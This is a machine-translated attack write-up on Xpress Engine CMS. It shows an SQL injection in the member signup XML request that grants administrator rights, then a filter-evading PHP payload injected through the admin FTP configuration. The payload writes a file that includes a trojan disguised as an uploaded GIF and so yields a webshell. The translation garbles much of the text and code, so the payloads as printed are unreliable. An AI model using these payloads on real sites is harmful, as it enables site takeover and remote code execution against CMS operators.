Xpress Engine Injection & amp; Get Webshell (including solution)

I checked the XE program in the Security Detection and found that it was a common Cms in South Korea. Then I tried to discover the vulnerability. Unfortunately, I had a scan, no usable vulnerabilities were detected, so I had to turn to Google for help. This injection was published by a South Korean hacker organization, but it was not Korean and the article was very simple, the only useful part is the vulnerability file and code snippet...

 

So I went back to the cms and read it. I dug an Insert-type injection...

 

The problem lies in/xe/classes/db/DBMysql. class. php. Which of the following is not explained? After all, it is not discovered by yourself.

 

Modify post upon registration:

<? Xml version = "1.0" encoding = "UTF-8"?>

<MethodCall>

<Params>

<_ Filter> <! [CDATA [signup]> </_ filter>

<User_id> <! [CDATA [wood11]> </user_id>

<Password> <! [CDATA [wooden]> </password>

<Password2> <! [CDATA [wooden]> </password2>

<User_name> <! [CDATA [wooden]> </user_name>

<Nick_name> <! [CDATA [wood]> </nick_name>

<Email_address> <! [CDATA [wooden@www.com]> </email_address>

<Find_account_question> <! [CDATA [, 24) #]> </find_account_question>

<Find_account_answer> <! [CDATA [test]> </find_account_answer>

<Birthday> <! [CDATA [2, 20110712]> </birthday>

<Allow_mailing> <! [CDATA [Y]> </allow_mailing>

<Module> <! [CDATA [member]> </module>

<Act> <! [CDATA [procMemberInsert]> </act>

</Params>

</MethodCall>

After the submission, the administrator privilege is assigned... Let's talk about Shell.

 

Since the article in South Korea did not mention shell, after a study with amote, I finally got shell...

 

In the background's Setting settings, there is a module for submitting Ftp information, and it is the files/config/ftp for writing files. config. php, you will think that writing a single sentence is complete. At first I thought so, but please refer to the submitted code:

<? Php if (! Defined ("_ ZBXE _") exit ();

$ Ftp_info-> ftp_user = 'as ';

$ Ftp_info-> ftp_port = 'asd ';

$ Ftp_info-> ftp_host = 'asd ';

$ Ftp_info-> ftp_pasv = 'y ';

$ Ftp_info-> ftp_root_path = 'ss'

?>

 

The key is to start to judge if (! Defined ("_ ZBXE _") exit ();, obviously, if you directly access it, the program exits directly, no matter what you submit, the idea was broken, so I continued to translate the code.

If this is found in most configuration files, the problem will be solved. You only need to find the host call page of the file, that is, the main file that defines the ZBXE identity, and ask him to call ftp. config. php can execute the code...

 

After several pieces of code, I finally found the host function: index. php In the modules module of index. php? Module = admin & act = dispAdminConfig. Then, you only need to call this function, and then assign zbxe to ftp. config. php. Naturally, you can execute the inserted sentence.

 

However, don't be too happy. When you insert a sentence, you find that the program filters out many special symbols such as $, &, @, which are similar to <? Php eval ($ _ POST [c])?> A Trojan with special characters cannot be inserted, and the Gpc is enabled, 'will also be escaped

The following conditions must be met:

The inserted code cannot contain special symbols such as $, &, and @.

Cannot Use '-- ps: gpc Enabled

Because the file is in the php code, it must be closed before and after and cannot cause an error in the file.

 

OK. After the study, it is impossible to insert a trojan. Well, let's just release the final code:

Ss \ '; define ("_ ZBXE _", "Hello world! ");?> <? Php fputs (fopen ("Wooden. php", "w"), "<? Include \ "files/attach/images/55520/491/092/dd084814f98d139fa5aae08414b75ea4.gif \";?> ")?> <? //;

Note that the \ 'At the beginning will be transferred to \' and the \ 'submitted by ourselves will be transferred due to the on feature of gpc. Otherwise, if you submit the statement separately, the program reports an error and the principle is not explained. After the statement is called, a Wooden is generated in the root directory. before uploading php files, you must enable file upload in the background and upload an image file of a php Trojan. Then, enter the trojan path in include. Note, double quotation marks must be used because of gpc, but the nested double quotation marks in multiple layers report an error. Therefore, the double quotation marks under the include must be escaped.

 

OK. After submission, access a local webshell contained in Wooden. php.

 

The article ends here and I have to admit that the process is rather tortuous, mainly in structural aspects.

By: Stay